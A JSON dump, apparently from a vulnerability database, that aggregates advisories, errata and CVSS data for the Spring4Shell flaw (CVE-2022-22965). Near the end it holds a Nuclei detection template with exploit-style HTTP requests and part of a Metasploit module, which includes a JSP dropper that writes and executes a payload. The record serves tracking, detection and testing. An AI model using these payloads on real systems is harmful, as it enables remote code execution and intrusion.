"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:59C3D813302731E6DE220FB088280F67", "href": "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T13:29:16", "description": "Recently, we observed the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 being actively exploited by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:AFF0912EF635E2446F0D546515038F73", "href": "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2022-04-08T19:36:04", "description": "UPDATE, APRIL 4, 2022: The Kenna Risk Score for CVE-2022-22965 is currently at maximum 100. This is an exceptionally rare score, of which only 415 out of 184,000 CVEs (or 0.22 percent) have achieved, reflecting the severity and potential effects of this vulnerability. To get a risk score this high... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T10:26:10", "type": "talosblog", "title": "Threat Advisory: Spring4Shell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T10:26:10", "id": "TALOSBLOG:3587BB077717B0512A9D0EFCCBE8770B", "href": "http://blog.talosintelligence.com/2022/03/threat-advisory-spring4shell.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-12-03T15:39:42", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.9.4 serves as a replacement for Red Hat AMQ Broker 7.9.3, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:16", "type": "redhat", "title": "(RHSA-2022:1627) Low: Red Hat AMQ Broker 7.9.4 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:46", "id": "RHSA-2022:1627", "href": "https://access.redhat.com/errata/RHSA-2022:1627", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.8.6 serves as a replacement for Red Hat AMQ Broker 7.8.5, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:11", "type": "redhat", "title": "(RHSA-2022:1626) Low: Red Hat AMQ Broker 7.8.6 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:24", "id": "RHSA-2022:1626", "href": "https://access.redhat.com/errata/RHSA-2022:1626", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "Red Hat Integration - Camel Extensions for Quarkus 2.2.1-1 serves as a replacement for 2.2.1 and includes the following security Fix(es):\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T14:02:32", "type": "redhat", "title": "(RHSA-2022:1306) Low: Red Hat Integration Camel Extensions for Quarkus 2.2.1-1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T14:02:57", "id": "RHSA-2022:1306", "href": "https://access.redhat.com/errata/RHSA-2022:1306", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis asynchronous security patch is an update to Red Hat Process Automation Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:05:38", "type": "redhat", "title": "(RHSA-2022:1378) Low: Red Hat Process Automation Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:06:00", "id": "RHSA-2022:1378", "href": "https://access.redhat.com/errata/RHSA-2022:1378", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "This release of Red Hat Fuse 7.10.2 serves as a replacement for Red Hat Fuse 7.10.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ [fuse-7] (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T14:42:27", "type": "redhat", "title": "(RHSA-2022:1360) Low: Red Hat Fuse 7.10.2 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-13T14:42:43", "id": "RHSA-2022:1360", "href": "https://access.redhat.com/errata/RHSA-2022:1360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "A micro version update (from 1.6.4 to 1.6.5) is now available for Red Hat Camel K that includes CVE fixes in the base images, which are documented in the Release Notes document linked in the References section.\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T18:28:41", "type": "redhat", "title": "(RHSA-2022:1333) Low: Red Hat Integration Camel-K 1.6.5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-12T18:29:00", "id": "RHSA-2022:1333", "href": "https://access.redhat.com/errata/RHSA-2022:1333", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:39:42", "description": "Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and business optimization for solving planning problems. It automates business decisions and makes that logic available to the entire business. \n\nThis asynchronous security patch is an update to Red Hat Decision Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:29:33", "type": "redhat", "title": "(RHSA-2022:1379) Low: Red Hat Decision Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:29:56", "id": "RHSA-2022:1379", "href": "https://access.redhat.com/errata/RHSA-2022:1379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nuclei": [{"lastseen": "2023-12-05T08:59:00", "description": "\n Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "nuclei", "title": "Spring - Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-11-23T00:00:00", "id": "NUCLEI:CVE-2022-22965", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2022/CVE-2022-22965.yaml", "sourceData": "id: CVE-2022-22965\n\ninfo:\n name: Spring - Remote Code Execution\n author: justmumu,arall,dhiyaneshDK,akincibor\n severity: critical\n description: |\n Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit.\n reference:\n - https://tanzu.vmware.com/security/cve-2022-22965\n - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/\n - https://twitter.com/RandoriAttack/status/1509298490106593283\n - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw\n - https://twitter.com/_0xf4n9x_/status/1509935429365100546\n - https://nvd.nist.gov/vuln/detail/cve-2022-22965\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22965\n cwe-id: CWE-94\n epss-score: 0.97451\n epss-percentile: 0.99946\n cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: vmware\n product: spring_framework\n tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev\n\nhttp:\n - raw:\n - |\n POST {{BaseURL}} HTTP/1.1\n Content-Type: application/x-www-form-urlencoded\n\n class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n - |\n GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n\n payloads:\n interact_protocol:\n - \"http\"\n - https\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Java\"\n case-insensitive: true\n\n# digest: 490a0046304402207d1214cb3731202032faa78c28cfff30fd3b6a03e480a276427dd5ce5a4ee534022053c87126afe4da15d0c7ac618f90c53032a6bdddece680915da7f30f5bbe40e9:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-05T13:41:19", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be\nvulnerable to remote code execution (RCE) via data binding. The specific\nexploit requires the application to run on Tomcat as a WAR deployment. If\nthe application is deployed as a Spring Boot executable jar, i.e. the\ndefault, it is not vulnerable to the exploit. However, the nature of the\nvulnerability is more general, and there may be other ways to exploit it.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "UB:CVE-2022-22965", "href": "https://ubuntu.com/security/CVE-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-04-08T19:29:06", "description": "A remote code execution vulnerability exists in Spring Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Spring Core Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T00:00:00", "id": "CPAI-2022-0104", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-24T15:43:11", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.\n", "cvss3": {}, "published": "2022-04-07T13:22:18", "type": "metasploit", "title": "Spring Framework Class property RCE (Spring4Shell)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-13T13:16:01", "id": "MSF:EXPLOIT-MULTI-HTTP-SPRING_FRAMEWORK_RCE_SPRING4SHELL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/spring_framework_rce_spring4shell/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Retry\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n 